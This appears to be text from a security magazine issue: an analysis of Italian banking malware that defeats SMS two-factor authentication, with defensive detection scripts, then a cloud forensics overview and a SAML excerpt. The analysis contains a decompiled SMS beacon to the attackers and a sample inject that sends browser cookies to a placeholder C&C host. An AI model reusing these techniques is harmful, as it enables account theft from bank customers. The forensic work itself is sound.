    However, today this system is hackable by malicious users. Trend Micro said: "The attack is designed to bypass a certain two-factor authentication scheme used by banks. In particular, it bypasses session tokens, which are frequently sent to users' mobile devices via Short Message Service (SMS). Users are expected to enter a session token to activate banking sessions so they can authenticate their identities. Since this token is sent through a separate channel, this method is generally considered secure."

    This article is a real use case of this kind of malicious software. During our recent analysis of malware targeting Italian financial institutions, we found a very capable sample that can bypass 2FA with a malicious app installed on the phone. Malware like this can drive the user to download the fake application to their phone from the official Google Play Store, using a Man in the Browser (MITB) attack. Once on the user's PC, the attacker can take full control of the machine and interact with it through a Command and Control (C&C) server. What we describe in this article is a real, active botnet with at least 40 compromised zombie hosts.

    What you will learn:

    - How financial cybercrime is evolving
    - How the new mobile-based security solutions are bypassed
    - How the attacker can control and steal your money

    What you should know:

    - A basic knowledge of how two-factor authentication works
    - Familiarity with Android/iOS app requirements
    - What a MITB attack is


    HOW THE 2FA IS BYPASSED

    Recently we have been seeing criminals developing more sophisticated solutions and gaining increasing knowledge of mobile and web programming. This is happening throughout the entire world, though it is concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA used by 90% of banks, by developing legitimate-looking applications published in the Google Play Store and Apple App Store. These applications can steal information on the phone, intercept it and send it over the network silently. The latest such operation, Operation Emmental, discovered by Trend Micro, works in just this way. In this section, we will see how a criminal can force a user to download and install the mobile application.

    When the malware infects the machine and the user navigates to the online banking platform, a MITB attack starts, injecting JavaScript code into the browser. This injection modifies some data in the page while keeping the same structure. During navigation the hijacked website invites the user to download the fake application, explaining all the steps for entering data into the bogus form. The app can be downloaded in two different ways:

    SMS

    Entering your number in the fake form, you receive an SMS with the download link from the store. Here is a screenshot of a received SMS. The fake app's name resembles those of many programs used to encrypt and share sensitive information, and people trust the app because of its name.

    Figure 1. SMS sent by attackers to download the APK

    QR CODE

    A QR code is shown by the MITB attack during navigation of the online banking website. Here is a screenshot of the image used to redirect the user to the Google Play Store.


    Figure 2. QR code used to download the APK

    A case of QR codes is reported by Trend Micro in this image. When the user did not use the SMS or the link inside the web page, a QR code appears. Scanning it with any QR reader from the store, the user is redirected to the Google Play Store to download the app.

    Figure 3.

    Every single step is given to the victim by the attackers, as reported below:

    STEP ONE

    When the Google Play Store is opened, click on the install button and accept the app authorizations. Rights are requested to send, receive and intercept SMS, and to read/write the file system.


    Figure 4.

    Description provided by attackers:

    "Secure sms transmission with asymmetric encryption, totaly automaticaly. Totaly secure sms. Private-key infrastructure (PKI). Comfortable and easy use, one time installation. This application is created to protect sensetive data received over sms. Even if the sms is intersepted nothing can be reached from the encrypted text. The encrypted text can only be decrypted by your personal private key, generated just after the first launch. Each key is unique and has its own identification number.

    Functionality:

    A Keypair is created after first launch. A unique identification number is granted. With the Private Key you decrypt messages, received from the trusted saurses. Send your Private Key Identifiction Number to the organization which wants to send you an encrypted message. The organization encrypts the message with your Private Key and sends the encrypted message to you. ONLY YOU can decrypt the encrypted Message with your Private Key.

    Instruction:

    Doqnload and install the app. Launch the aplication. Waint till your private kay is generated. Share your Private Key identification number."

    The description is full of spelling errors, which suggests that its authors are not from an English-speaking country.


    Analyzing the APK and decompiling it, we found the rights requested by the malicious app.
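As an added illustration of that triage step (example code written for this edit, not the authors' analysis and not the malware's own code), the following Python script inspects a decoded AndroidManifest.xml for the combination that makes OTP theft possible: an SMS_RECEIVED broadcast receiver plus the permissions to read and to send SMS. It assumes the manifest has already been decoded to plain XML, for example with apktool; the manifest embedded below is a constructed sample modelled on the rights listed above, and the package and class names in it are placeholders.

```python
"""Triage of a decoded AndroidManifest.xml for SMS-interception capability.

Added example, not code from the article or from the malware it describes.
Assumes the manifest has been decoded to plain XML (e.g. with apktool).
SAMPLE_MANIFEST is a constructed sample; package and class names are placeholders.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS
PRIORITY = "{%s}priority" % ANDROID_NS
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.securesms">
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <application android:label="Secure SMS">
        <receiver android:name=".SmsReceiver" android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Permissions that, together with an SMS_RECEIVED receiver, let an app read a
# bank's one-time code (READ_PERMS) and ship it out again (EXFIL_PERMS).
READ_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}
EXFIL_PERMS = {"android.permission.SEND_SMS", "android.permission.INTERNET"}


def sms_receivers(root):
    """Return [(receiver class, intent-filter priority)] for every SMS_RECEIVED receiver."""
    found = []
    for receiver in root.iter("receiver"):
        for flt in receiver.iter("intent-filter"):
            actions = {a.get(NAME) for a in flt.iter("action")}
            if SMS_RECEIVED in actions:
                found.append((receiver.get(NAME), int(flt.get(PRIORITY, "0"))))
    return found


def analyse_manifest(xml_text):
    """Summarise permissions and receivers and decide whether the app can steal OTP SMS."""
    root = ET.fromstring(xml_text)
    perms = {e.get(NAME) for e in root.iter("uses-permission")}
    receivers = sms_receivers(root)
    exfil = perms & EXFIL_PERMS
    findings = []
    if perms & READ_PERMS and receivers:
        findings.append("reads incoming SMS via an SMS_RECEIVED receiver")
    if any(prio >= 999 for _, prio in receivers):
        # A high priority puts the receiver ahead of the user's SMS app in the
        # ordered broadcast; on Android before 4.4 it could also abort the
        # broadcast so the victim never saw the bank's message.
        findings.append("high-priority receiver: runs ahead of the user's SMS app")
    if exfil:
        findings.append("exfiltration channel: " + ", ".join(sorted(exfil)))
    return {
        "package": root.get("package"),
        "permissions": sorted(perms),
        "sms_receivers": receivers,
        "findings": findings,
        # The capability described in the article: read the OTP and forward it.
        "otp_theft_capable": bool(perms & READ_PERMS and receivers and exfil),
    }


if __name__ == "__main__":
    report = analyse_manifest(SAMPLE_MANIFEST)
    print(report["package"], "OTP theft capable:", report["otp_theft_capable"])
    for line in report["findings"]:
        print(" -", line)
```

In practice you point analyse_manifest at the manifest apktool writes out; the verdict is only a starting point, since a legitimate SMS app asks for the same rights, but the combination of a high-priority receiver and an outbound channel in an app that advertises itself as an "encrypted SMS" utility is exactly what the decompilation above turned up.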

    STEP TWO

    Once installed, you need to open the app on your phone to see a random number generator. Users need to enter this number in the online banking page to log in to the portal. Trend Micro says: "At this stage, the users have to enter the password that was generated by the fake app. The app has a preset list of possible passwords and just randomly chooses one. The Web page, meanwhile, simply checks if one of those possible passwords was entered. Guessing numbers does not work; the users will not be able to proceed with the fake banking authentication."

    Figure 5.

    Installing the Android app allows the attackers to gain full control of the user's online banking sessions because, in reality, it intercepts the session tokens sent via SMS to the user's phone, which are then forwarded to the cybercriminals. The spoofed website allows the attackers to obtain the user's login credentials while the mobile app intercepts the real session tokens sent by the bank. As a result, the attackers obtain everything they need to fake the user's online banking transactions.

    The app waits for an SMS from the user's bank, which provides an OTP or a legitimate session token (.tok). When one is received, the app hijacks the communication in the background and forwards the stolen data to a number in an encrypted SMS.

    Here is a decompiled piece of code used to test the availability of the server (the number is redacted):

        Settings.sendSms(this, new MessageItem("+39366134xxxx", "Hello are you there?"));

    Communication starts with a simple SMS requesting service availability. When an SMS is received from a bank number, the interception starts and an encrypted SMS is sent with the stolen information.
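That sequence (a beacon to a fixed number, then an opaque outbound SMS seconds after the bank's code arrives) leaves a trace in the phone's own SMS store. As an added example (not from the article and not the malware's code), the following Python script shows how an analyst can find the pattern after the fact. It assumes rows in the shape of the sms table in Android's mmssms.db (date in milliseconds, address, type 1 received / 2 sent, body); the rows embedded below are constructed, the bank sender name is invented and the drop number is a placeholder rather than the number seen in the decompiled code.

```python
"""Detect OTP forwarding in rows exported from Android's SMS database.

Added example, not code from the article or the malware. Rows mimic the "sms"
table of mmssms.db: date (ms since epoch), address, type (1 = received,
2 = sent), body. SAMPLE_SMS is constructed; DROP_NUMBER is a placeholder.
"""
import math
import re

WINDOW_SECONDS = 60                    # outbound SMS this soon after a bank OTP is suspicious
OTP_RE = re.compile(r"\b\d{4,8}\b")    # one-time codes are usually 4 to 8 digits
BASE64ISH_RE = re.compile(r"^[A-Za-z0-9+/=]{16,}$")
DROP_NUMBER = "+390000000001"          # constructed placeholder for the attackers' number

SAMPLE_SMS = [
    # Beacon to the drop number, mirroring the decompiled "are you there?" check.
    {"date": 1400000000000, "address": DROP_NUMBER, "type": 2, "body": "Hello are you there?"},
    {"date": 1400000005000, "address": DROP_NUMBER, "type": 1, "body": "yes"},
    # The bank sends the one-time code ...
    {"date": 1400000120000, "address": "MyBank", "type": 1,
     "body": "Codice per la disposizione 1234: 485920"},
    # ... and three seconds later the phone sends an opaque blob to the drop number.
    {"date": 1400000123000, "address": DROP_NUMBER, "type": 2,
     "body": "U2FsdGVkX1+8f3QyZ1h0b2tlbjo0ODU5MjA="},
    # Ordinary traffic that must not be flagged.
    {"date": 1400003600000, "address": "+391234567890", "type": 2, "body": "See you at 8"},
]


def shannon_entropy(text):
    """Bits per character: prose sits around 4, random base64 closer to 6."""
    if not text:
        return 0.0
    counts = {c: text.count(c) for c in set(text)}
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())


def looks_opaque(body):
    """True when the body reads like an encrypted or encoded blob rather than a sentence."""
    return bool(BASE64ISH_RE.match(body)) and shannon_entropy(body) > 4.0


def detect_otp_forwarding(rows, window=WINDOW_SECONDS):
    """Pair each received OTP with sent messages that follow it within `window` seconds."""
    rows = sorted(rows, key=lambda r: r["date"])
    findings = []
    for i, row in enumerate(rows):
        if row["type"] != 1 or not OTP_RE.search(row["body"]):
            continue
        otp_time = row["date"] / 1000
        codes = OTP_RE.findall(row["body"])
        for later in rows[i + 1:]:
            delay = later["date"] / 1000 - otp_time
            if delay > window:
                break
            if later["type"] != 2 or later["address"] == row["address"]:
                continue                       # not outbound, or a reply to the bank itself
            reasons = ["sent %.0fs after OTP from %s" % (delay, row["address"])]
            if looks_opaque(later["body"]):
                reasons.append("body looks encrypted/encoded")
            if any(code in later["body"] for code in codes):
                reasons.append("body contains the OTP in clear")
            # Earlier contact with the same recipient (e.g. a beacon) strengthens the case.
            earlier = [r for r in rows[:i] if r["address"] == later["address"]]
            if earlier:
                reasons.append("%d earlier message(s) with the same number" % len(earlier))
            findings.append({"otp_time": otp_time, "drop_number": later["address"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_otp_forwarding(SAMPLE_SMS):
        print(f["drop_number"], "; ".join(f["reasons"]))
```

The timing rule alone will occasionally catch a user who texts a friend right after a bank notification, which is why the script also reports whether the outbound body is opaque and whether the same number was contacted before; on a real device, compare any flagged number against the contacts database too, since the malware's drop number will not be in it.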


    C&C CENTER FUNCTION DETAILS

    During our code analysis we found a link to a JavaScript file used by the criminals during the injection process of the MITB attack. Going deeper into the obfuscated code, we found a link to the C&C server where data is sent. Behind the front end, which was password protected, we saw a custom control panel used to control the botnet. Every single bot is represented in a table and is controlled from the panel. The first screen you see behind the login panel is a statistics page with the number of compromised hosts.
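The layers that hide such a link in a web inject are usually simple ones: character-code arrays, \x and \u escapes, and strings chopped into concatenated pieces. As an added example (not the authors' code and not the actual inject), the Python below strips those layers in turn and lists the URLs that appear. The JavaScript snippet it works on is constructed for the example, and the example.net and example.org hosts are placeholders, not real indicators.

```python
"""Peel common JavaScript string obfuscation to recover C&C URLs.

Added example, not code from the article or from the injected script it
describes. SAMPLE_INJECT_JS is constructed; the hostnames are placeholders.
"""
import re

SAMPLE_INJECT_JS = r"""
var gate = String.fromCharCode(104,116,116,112,58,47,47,99,50,46,101,120,97,109,112,108,101,46,110,101,116,47,103,97,116,101,46,112,104,112);
var panel = "\x68\x74\x74\x70\x73\x3a\x2f\x2f" + "\u0064\u0072\u006f\u0070" + '.exam' + 'ple.org/p' + 'anel/';
document.getElementById("login").innerHTML += "<div>Scarica la app per continuare</div>";
new Image().src = gate + "?d=" + encodeURIComponent(document.cookie);
"""

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]*)\)")
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
UNICODE_ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})")
# Two adjacent simple string literals joined with '+', e.g. "ab" + 'cd'
CONCAT_RE = re.compile(r"""(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3""")
URL_RE = re.compile(r"https?://[^\s\"'<>;)]+")


def decode_fromcharcode(js):
    """Replace String.fromCharCode(104,116,...) with the string literal it builds."""
    def repl(m):
        codes = [int(c) for c in re.findall(r"\d+", m.group(1))]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE_RE.sub(repl, js)


def decode_escapes(js):
    """Resolve \\xHH and \\uHHHH escapes so the literals become readable."""
    js = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return UNICODE_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)


def join_concats(js):
    """Fold "a" + "b" + 'c' into "abc", repeating until nothing changes."""
    previous = None
    while previous != js:
        previous = js
        js = CONCAT_RE.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', js)
    return js


def deobfuscate(js):
    """Apply the three layers in the order the obfuscation was built up."""
    return join_concats(decode_escapes(decode_fromcharcode(js)))


def extract_urls(js):
    """Sorted, de-duplicated URLs visible once the obfuscation layers are removed."""
    return sorted(set(URL_RE.findall(deobfuscate(js))))


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_INJECT_JS):
        print(url)
```

This handles the layers seen in simple injects; packers that build strings at run time from arrays indexed by arithmetic need a JavaScript interpreter rather than regular expressions, so treat an empty result as "look harder", not as "no C&C".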

    Figure 6.

    In the second one (Logs) there is all the information about the bots. Every single user is cataloged with these parameters:

    - Used browser
    - Last operation on that bot
    - IP
    - Login
    - Password
    - User Type (file, flash)
    - PIN
    - Action (request data login)

    As you can see in the panel shown below, in the C&C server the attackers have all they need to access an online banking website with the stolen credentials. This panel is very powerful because it can send a request to the infected user to enter their credentials once more.

    Figure 7.


    Clicking on the icons on the right, it is possible to send the request to a bot.

    Figure 8.

    Analyzing every single bot, it is possible to see more details about it by clicking on the PIN.

    The third page is the JS page, used by the attacker to inject code into the bot's browser. To enable the form there is a hidden command, discovered through JavaScript code analysis of that page.

    Figure 9.

    The fourth section is the Jabber page, where an attacker can change his XMPP username and password, and the last page is dedicated to setting the password for this panel.

    Figure 10.


    Figure 11.

    CONCLUSION

    The platform used by these criminals is very powerful because it is not only a drop zone where stolen data is sent, but a real C&C server: they can interact with the malware and send it commands to execute on the infected machine. This kind of methodology is spreading every day, and the attackers have increasingly sophisticated resources: a Windows malware sample, a malicious Android app, a rogue DNS resolver, a phishing web server with fake bank site pages, and a compromised server used as C&C. Banks that use this kind of SMS-based authentication are exposing their users to rogue apps.

    Today there are more secure ways to access an online banking portal, such as card readers, TAN lists and multi-factor authentication, but they are more cumbersome and slower. We want to move fast, without any problem or slowdown. But is this good for our online bank accounts?

    STATISTICS

    The attack is alive and the number of compromised users is increasing every day. We have detected more than 40 compromised hosts and accounts so far.

    REFERENCES

    http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

    ABOUT THE AUTHORS

    Davide Cioccia is a Security Consultant at Reply S.p.A., Communication Valley Security Operations Center, in Italy. MSc in Computer Engineering with a Master's thesis on a new way to combat the Advanced Persistent Threat, and Microsoft Certified Professional (MCP, MS), he has written many articles about financial cybercrime, botnets, drop zones and APTs. Key assignments include anti-fraud management, anti-phishing services for financial institutions, drop zone and malware analysis, and cyber intelligence platform development.

    E-Mail: [email protected]
    Twitter: https://twitter.com/david107
    LinkedIn: https://www.linkedin.com/in/davidecioccia

    Senad Aruch. Multiple Certified ISMS Professional with a 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analysis, ISMS and Risk, Ethical Hacking, Vulnerability Management, Anti-Fraud and Cyber Security.

    E-Mail: [email protected]
    Blog: www.senadaruc.com
    Twitter: https://twitter.com/senadaruch
    LinkedIn: https://www.linkedin.com/in/senadaruc


    AN OVERVIEW OF CLOUD FORENSICS

    by Dejan Lukan

    When discussing cloud forensics, we're actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed by physical or virtual hardware. In recent years there has been a significant increase in the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment.

    There are many benefits of virtualized servers, which we won't go into now, but the most prominent ones are definitely low cost, ease of use, and the ability to move them around in seconds without service downtime. Basically, cloud computing is just a fancy term created by marketing people, but we've all been using it for years. A good example of cloud computing is an email service where we don't have to install an email client on our local computer to access our new email and which serves as storage for all email. Instead, everything is already done by the cloud: the email messages are stored in the cloud and, even if we switch to a different computer, we only need to log in with our web browser and everything is there. Therefore, we only need an interface with which we can access our cloud application, which in the previous example is simply a web browser. Cloud computing has many benefits, but the two most distinct disadvantages are definitely security and privacy. Since we store all our data in the cloud somewhere on the Internet, the cloud provider has access to our data, and so does an attacker if a breach occurs in the provider's network.

    Network forensic analysis is part of the digital forensics branch, which monitors and analyzes computer network traffic for the purposes of gathering information, collecting legal evidence, or detecting intrusions [1]. When talking about network forensics, we're actually talking about the data that has been transmitted over the network, which might serve as the only evidence of an intrusion or malicious activity. Obviously that's not always the case, since an intruder often leaves evidence on the hard disk of the

  • 8/10/2019 EForensics Open 2014-2

    23/7223 www.eForensicsMag.com

    compromised host as well in the form of log files, uploaded malicious files, etc. But when the attackeris very careful not to leave any traces on the compromised computer, the only evidence that we mighthave is in the form of captured network traffic. When capturing network traffic, we most often want toseparate the good data from the bad by extracting useful information from the traffic, such as transmit-ted files, communication messages, credentials, etc. If we have a lot of disk space available, we can

    also store all the traffic to disk and analyze it at a later time if needed, but obviously this requires agreat amount of disk space. Usually we use network forensics to discover security attacks being con-ducted over the network. We can use a tool like tcpdumpor Wireshark to perform network analysis onthe network traffic.

CLOUD COMPUTING

Let's talk a little bit about the deployment models of cloud computing, which are described below (summarized after [2]):

• Private cloud: The services of a private cloud are used only by a single organization and are not exposed to the public. A private cloud is hosted inside the organization and is behind a firewall, so the organization has full control of who has access to the cloud infrastructure. The virtual machines are then still assigned to a limited number of users.
• Public cloud: The services of a public cloud are exposed to the public and can be used by anyone. Usually the cloud provider offers a virtualized server with an assigned IP address to the customer. An example of a public cloud is Amazon Web Services (AWS).
• Community cloud: The services of a community cloud are used by several organizations to lower the costs, as compared to a private cloud.
• Hybrid cloud: The services of a hybrid cloud can be distributed in multiple cloud types. An example of such a deployment is when sensitive information is kept in private cloud services by an internal application. That application is then connected to the application on a public cloud to extend the application functionality.
• Distributed cloud: The services of a distributed cloud are distributed among several machines at different locations but connected to the same network.

The service models of cloud computing are the following (summarized after [2]):

• IaaS (infrastructure as a service) provides the entire infrastructure, including physical/virtual machines, firewalls, load balancers, hypervisors, etc. When using IaaS, we're basically outsourcing a complete traditional IT environment, where we're renting a complete computer infrastructure that can be used as a service over the Internet.
• PaaS (platform as a service) provides a platform such as an operating system, database, web server, etc. We're renting a platform or an operating system from the cloud provider.
• SaaS (software as a service) provides access to the service, but you don't have to manage it because it's done by the service provider. When using SaaS, we're basically renting the right to use an application over the Internet.

There are also other service models that we might encounter:

• Desktop as a service: We're connecting to a desktop operating system over the Internet, which enables us to use it from anywhere. It's also not affected if our own physical laptop gets stolen, because we can still use it.
• Storage as a service: We're using storage that physically exists on the Internet as if it were present locally. This is very often used in cloud computing and is the primary basis of a NAS (network attached storage) system.
• Database as a service: Here we're using a database service installed in the cloud as if it were installed locally. One great benefit of using database as a service is that we can use highly configurable and scalable databases with ease.
• Information as a service: We can access any data in the cloud by using the defined API as if it were present locally.
• Security as a service: This enables the use of security services as if they were implemented locally.

There are other services that exist in the cloud, but we've presented just the most widespread ones that are used on a daily basis.


If we want to start using the cloud, we need to determine which service model we want to use. The decision largely depends on what we want to deploy to the cloud. If we would like to deploy a simple web application, we might want to choose a SaaS solution, where everything will be managed by the service provider and we only have to worry about writing the application code. An example of this is writing an application that can run on Heroku.

We can think of the service models in terms of layers, where IaaS is the bottom layer, which gives us the most access to customize most of the needed infrastructure. PaaS is the middle layer, which automates certain things, but is less configurable. The top layer is SaaS, which offers the least configuration, but automates a large part of the infrastructure that we need when deploying an application.

CLOUD NETWORK FORENSICS

The first thing that we need to talk about is defining why cloud network forensics is even necessary. The answer to that is rather simple: because of attackers trying to hack our cloud services. We need to be notified when hackers are trying to gain access to our cloud infrastructure, platform, or service. Let's look at an example. Let's imagine that company X is running a service Y in the cloud; the service is very important and has to be available 24/7. If the service is down for a few hours, it could mean a considerable financial loss for X's site. When such an attack occurs, company X must hire a cloud forensics expert to analyze the available information. The forensic analyst must look through all the logs on the compromised service to look for forensic evidence. The forensic analyst soon discovers that the attack was conducted from the cloud provider's network, so he asks the cloud provider to give him the logs that he needs.

At this point, we must evaluate what logs the forensics investigator needs in order to find out who was behind the attack. This is where cloud network forensics comes into play. Basically, we need to take the digital forensics process and apply it to the cloud, where we need to analyze the information we have about filesystems, processes, registry, network traffic, etc. When collecting the information that we can analyze, we must know which service model is in use, because collecting the right information depends on it.

When using different service models, we can access different types of information, as is shown in the table below [3,4]. If we need additional information from the service model that we're using, which is not specified in the table below, we need to contact the cloud service provider and they can send us the required information. The table below presents different columns, where the first column contains the different layers that we might have access to when using cloud services. The SaaS, PaaS, and IaaS columns show the access rights we have when using the various service models, and the last column presents the information we have available when using a local computer that we have physical access to.

Information        SaaS    PaaS    IaaS    Local
Networking
Storage
Servers
Virtualization
OS
Middleware
Runtime
Data
Application
Access Control

It's evident from the table that, when using a local computer, we have maximum access, which is why the analysis of a local machine is the most complete. I intentionally didn't use the term easiest, because that's not true, since when we have maximum access to the computer, there are multiple pieces of evidence that we can collect and analyze. The problem with cloud services is that the evidence needs to be provided by the CSP (cloud service provider): if we want to get application logs, database logs, or network logs when using the SaaS service model, we need to contact the service provider in order to get them, because we can't access them by ourselves. Another problem is that the user's data is kept together with the data of other users on the same storage system, so it's hard to separate just the data that we need to conduct an analysis. If two users are using the same web server for hosting a web page, how can we prove that the server's log contains the data of the user that we're after? This is quite a problem when doing a forensic analysis of the cloud service.
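As an added illustration of the multi-tenant problem just described (this is example code, not from the article), the following Python script separates a shared web server's access log by virtual host and produces a hash manifest for the extracted subset. The log lines, host names and addresses are constructed; the format assumed is Apache's combined format with a leading virtual-host field. Entries without that field cannot be tied to any one tenant, so the script reports them as a caveat instead of silently dropping them, which is exactly the gap the question above points at.

```python
"""Per-tenant extraction of a shared web-server log, with an evidence manifest.

Added example (not from the article). The sample log below is constructed in
Apache "combined" format with a leading "<vhost>:<port>" field. Lines that
lack the vhost field cannot be attributed to one tenant and are flagged.
"""
import hashlib
import re

# Constructed sample log: two tenants share one web server. The third line
# deliberately has no vhost prefix, so it could belong to either tenant.
SAMPLE_LOG = """\
shop.example.test:443 203.0.113.5 - - [10/Mar/2014:10:12:01 +0000] "GET /admin HTTP/1.1" 403 512 "-" "curl/7.35.0"
blog.example.test:443 198.51.100.7 - - [10/Mar/2014:10:12:03 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2014:10:12:05 +0000] "GET /wp-login.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
shop.example.test:443 203.0.113.5 - - [10/Mar/2014:10:12:09 +0000] "POST /login HTTP/1.1" 401 128 "-" "curl/7.35.0"
"""

# "<host>:<port> <client> <ident> <user> [<time>] "<request>" <status> ..."
VHOST_RE = re.compile(
    r'^(?P<vhost>[A-Za-z0-9.-]+):(?P<port>\d+)\s+(?P<client>\S+)\s+\S+\s+\S+\s+'
    r'\[(?P<time>[^\]]+)\]\s+"(?P<request>[^"]*)"\s+(?P<status>\d{3})'
)


def split_by_tenant(log_text):
    """Group entries by virtual host.

    Returns (per_tenant, unattributable): a dict vhost -> list of raw lines,
    and the lines that carry no vhost field and so cannot be tied to a tenant.
    """
    per_tenant = {}
    unattributable = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = VHOST_RE.match(line)
        if m:
            per_tenant.setdefault(m.group("vhost"), []).append(line)
        else:
            unattributable.append(line)
    return per_tenant, unattributable


def evidence_manifest(lines):
    """Manifest for a handed-over subset: entry count, SHA-256 of the exact
    bytes, and per-line hashes so a later change to one entry is detectable."""
    blob = "\n".join(lines).encode("utf-8")
    return {
        "entries": len(lines),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "line_sha256": [hashlib.sha256(l.encode("utf-8")).hexdigest() for l in lines],
    }


def extract_tenant(log_text, vhost):
    """Return (lines, manifest, caveats) for one tenant's entries."""
    per_tenant, unattributable = split_by_tenant(log_text)
    lines = per_tenant.get(vhost, [])
    caveats = []
    if unattributable:
        caveats.append(f"{len(unattributable)} entries lack a vhost field and could belong to any tenant")
    return lines, evidence_manifest(lines), caveats


if __name__ == "__main__":
    lines, manifest, caveats = extract_tenant(SAMPLE_LOG, "shop.example.test")
    print(manifest["entries"], manifest["sha256"], caveats)
```

The manifest is what an analyst would record alongside the extracted lines; the caveat list is what must be disclosed when the attribution cannot be made from the log alone.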

Let's describe every entry from the table above, so it will make more sense.

• Networking: In a local environment, we have access to the network machines, such as switches, routers, IDS/IPS systems, etc. We can access all of the traffic passing through the network and analyze it as a part of gathering as much data as we possibly can. When using the cloud, even the CSP doesn't have that kind of data, because it mustn't log all the traffic passing through the network, since users' data is confidential and the CSP can't record, store, and analyze it. The CSP might only apply an IDS/IPS solution to the network, which only analyzes traffic for malicious behavior and alerts the provider of such activity.
• Storage: When we have hardware access to the machine, we know exactly where the data is located but, when using a cloud service, the data could be anywhere, even in different states, countries, or even continents.
• Servers: In a traditional system, we have physical access to the machine, which is why we can actually go to the machine and analyze the data on it; all the data is local to the machine. This isn't possible when using the cloud, because the data is dispersed through multiple data centers and it's hard to confirm that we've actually collected all the needed data.
• Virtualization: In a local environment, we have access to the virtualization environment, where we can access the hypervisor, manage existing virtual machines, delete a virtual machine, or create a new virtual machine. In the public cloud, we normally don't have access to the hypervisor, but if we absolutely must have access, we can run a private cloud.
• OS: In a local environment, we have complete access to the operating system, as we do in the IaaS model, but not in the PaaS and SaaS models. If we want access to the operating system, we could connect to the SSH service running on the server and issue OS commands, which we can't do when using Heroku, for example.
• Middleware: The middleware connects two separate endpoints, which together form a whole application. For example, we might have a database running on a backend system and the web application connects to that database by using different techniques.
• Runtime: When using the IaaS model, we can influence how the application is started and stopped, so we have access to its runtime.
• Data/application: In the PaaS and IaaS models, we have access to all of the data and applications, which we can manage by using search, delete, add, etc. We can't do that directly when using the SaaS model.
• Access control: In all service models, we have access to the access control because, without it, we wouldn't have been able to access the service. We can control how access is granted to different users of the application.

When conducting forensic analysis in the traditional way, we can simply hire a forensics expert to collect all the data and analyze it from the local machine. In a cloud service, we can do the same, but we must also cooperate with the cloud service provider, which might not have the forensics experts available or simply might not care and therefore won't provide us with all the data that we need.

CONCLUSION

In this article, we've seen that, when conducting a cloud network forensic analysis, we do not have access to the same information as we do when conducting an analysis of a normal local computer system. We often do not have access to the information that we're after and must ask the cloud service provider to furnish the information we need. The problem with such data is that we must trust the cloud service provider to give us the right information; they might give us false information or hold back some very important information. This is just another problem when trying to use the data in court, because we must prove without a doubt that the evidence from the collected data belongs to the user; the process of collecting the data, preserving it, and analyzing it must be documented and acceptable in the court of law.


It has become increasingly obvious that usernames and passwords are ineffective ways of authenticating access, yet their use is still widespread as users balk at more cumbersome forms of authentication like tokens and certificates. While simple user names and passwords are no longer effective, the amount of data stored in the cloud continues to escalate. Cloud providers must accommodate access to millions of users from all over the world. A centralized breach in a cloud-based solution would pose a serious risk to the data of thousands if not more organizations. Therefore, end-users should select cloud providers that offer strong, flexible security that is extremely hard to compromise yet easy to use.

A CENTRALIZED SECURITY APPROACH

In light of the increasing need for stronger security for cloud access, businesses have begun to implement standards for authenticating users. One of the major problems organizations face is how to manage user identities in the cloud. To manage cloud identities, IT departments must often maintain an additional set of user credentials for each and every cloud solution used by their employees. This approach requires cumbersome procedures and extra work for IT. To bypass this problem, IT should use a centralized method that gives each user a single identity that provides access to a variety of different cloud solutions.

A centralized method like this ensures that those who access an organization's assets have been prequalified. It provides strong authentication while also freeing end-users from being dependent on specific software, hardware or features, for greater flexibility and convenience.

SAVING TIME WITH SAML

With the ability to allow secure Web domains to exchange user authentication and authorization data, Security Assertion Markup Language, or SAML, is one way to provide effective and easy identity management in the cloud. A SAML setup requires three roles: the end-user, the service provider and the identity provider. The service provider role is held by cloud solutions, such as Microsoft Office 365, Salesforce or Google Apps. The identity provider role handles user authentication and identity management for the service provider, and can be used as a centralized system to handle authentication and identity management for multiple service providers at once. By using a SAML identity provider, organizations can gain all the recognized benefits that are traditionally associated with on-premise authentication solutions.

SAML frees organizations from having to maintain multiple instances of user credentials, one in the local area network (LAN) and multiple in the cloud. In this way, SAML is a time saver. This way, the organization can keep its authentication and security mechanisms the same for all users, regardless of whether they are accessing data in the cloud or on the LAN, thus saving time and money while boosting security.
